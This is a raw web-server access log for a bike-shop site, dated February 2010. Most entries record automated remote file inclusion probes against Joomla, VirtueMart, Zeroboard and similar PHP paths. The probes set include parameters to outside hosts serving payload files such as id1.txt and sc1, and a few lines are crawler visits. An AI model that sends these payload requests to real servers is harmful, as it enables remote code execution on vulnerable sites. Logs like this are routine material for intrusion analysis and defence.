85.25.26.87 - - [10/Feb/2010:21:27:38 -0800] "GET /logs/access.log//include/wysiwyg/spaw_control.class.php?spaw_root=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.26.87 - - [10/Feb/2010:21:27:38 -0800] "GET /logs//include/wysiwyg/spaw_control.class.php?spaw_root=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.193.75 - - [10/Feb/2010:21:28:17 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [10/Feb/2010:21:30:19 -0800] "GET /bullitinboard/viewtopic.php?p=3505 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
77.79.245.1 - - [10/Feb/2010:21:33:48 -0800] "GET ///bbs///delete_all.php?board_skin_path=http://www.guok.ru/back/temp/bobrok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [10/Feb/2010:21:33:48 -0800] "GET /logs/access.log////bbs///delete_all.php?board_skin_path=http://www.guok.ru/back/temp/bobrok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [10/Feb/2010:21:33:48 -0800] "GET /logs////bbs///delete_all.php?board_skin_path=http://www.guok.ru/back/temp/bobrok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [10/Feb/2010:21:34:14 -0800] "GET ///bbs///delete_all.php?board_skin_path=http://www.guok.ru/back/temp/bobrok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [10/Feb/2010:21:34:14 -0800] "GET /logs////bbs///delete_all.php?board_skin_path=http://www.guok.ru/back/temp/bobrok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [10/Feb/2010:21:34:14 -0800] "GET /logs/access.log////bbs///delete_all.php?board_skin_path=http://www.guok.ru/back/temp/bobrok1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:37:52 -0800] "GET ///bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:37:52 -0800] "GET /logs/access.log////bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:37:52 -0800] "GET /logs////bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:39:31 -0800] "GET /logs////bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:39:31 -0800] "GET ///bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:39:31 -0800] "GET /logs/access.log////bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:42:13 -0800] "GET ///bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:42:13 -0800] "GET /logs/access.log////bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.241.31 - - [10/Feb/2010:21:42:13 -0800] "GET /logs////bbs/write_update.php/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:21:42:42 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:21:42:42 -0800] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:21:42:46 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:21:44:50 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:21:44:50 -0800] "GET /logs/access.log%20%20//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [10/Feb/2010:21:44:53 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:45:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:45:04 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:45:04 -0800] "GET /skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:45:11 -0800] "GET /skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:45:11 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:45:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:21:45:21 -0800] "GET /login.php?dir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:21:45:22 -0800] "GET /logs//login.php?dir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:21:45:22 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:47:50 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:21:47:53 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.119 - - [10/Feb/2010:21:49:07 -0800] "GET /logs/access.log HTTP/1.0" 200 356940 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
69.175.7.90 - - [10/Feb/2010:21:49:39 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.7.90 - - [10/Feb/2010:21:49:39 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.7.90 - - [10/Feb/2010:21:49:39 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:21:53:02 -0800] "GET /logs//login.php?dir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:21:53:02 -0800] "GET /login.php?dir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:21:53:07 -0800] "GET /logs/access.log%20%20//login.php?dir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:21:53:33 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:21:53:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.63.219.132 - - [10/Feb/2010:21:53:33 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.120 - - [10/Feb/2010:22:01:14 -0800] "GET /tools/send_reminders.php?includedir=http://drbeliy.ru/e7a342d14d54f7ccd15fb118f7db596f/cc??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
78.110.50.120 - - [10/Feb/2010:22:01:14 -0800] "GET /logs//tools/send_reminders.php?includedir=http://drbeliy.ru/e7a342d14d54f7ccd15fb118f7db596f/cc??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
78.110.50.120 - - [10/Feb/2010:22:01:15 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://drbeliy.ru/e7a342d14d54f7ccd15fb118f7db596f/cc??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:22:01:17 -0800] "GET /logs/access.log//?_zb_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:22:01:17 -0800] "GET /?_zb_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:22:01:18 -0800] "GET /logs//?_zb_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:22:01:34 -0800] "GET /?_zb_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:22:01:34 -0800] "GET /logs//?_zb_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:01:35 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:01:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:01:35 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
219.94.194.248 - - [10/Feb/2010:22:01:37 -0800] "GET /logs/access.log//?_zb_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:02:19 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:02:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:02:19 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:02:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:02:48 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:02:48 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:03:17 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:03:17 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:03:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:04:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:04:24 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:04:24 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:08:08 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:08:09 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:08:10 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:09:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:09:10 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:09:11 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:09:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:09:33 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:09:34 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.44 - - [10/Feb/2010:22:11:35 -0800] "GET /logs/access.log////write_comment_update.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.44 - - [10/Feb/2010:22:11:35 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.243.44 - - [10/Feb/2010:22:11:35 -0800] "GET ///write_comment_update.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:16 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:16 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:46 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:46 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:51 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:12:51 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:22:15:31 -0800] "GET /tools/send_reminders.php?includedir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:22:15:33 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:22:15:34 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:22:15:50 -0800] "GET /tools/send_reminders.php?includedir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:22:15:50 -0800] "GET /logs//tools/send_reminders.php?includedir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [10/Feb/2010:22:15:50 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:18:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:18:25 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:18:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.7.90 - - [10/Feb/2010:22:18:44 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:19:44 -0800] "GET /www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
58.150.99.131 - - [10/Feb/2010:22:20:22 -0800] "GET /www/appserv/main.php?appserv_root=http://tdos.org/images/log.png??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:21:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:21:06 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:21:06 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:22:10 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:22:10 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:22:10 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:22:53 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:22:57 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [10/Feb/2010:22:26:00 -0800] "GET /translations/Polish.txt HTTP/1.1" 200 33091 "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:29:07 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://korolikhin.ru//data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:29:07 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://korolikhin.ru//data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
79.98.23.9 - - [10/Feb/2010:22:29:07 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://korolikhin.ru//data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:31:07 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:31:07 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
60.251.165.181 - - [10/Feb/2010:22:31:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.205.6.233 - - [10/Feb/2010:22:33:34 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
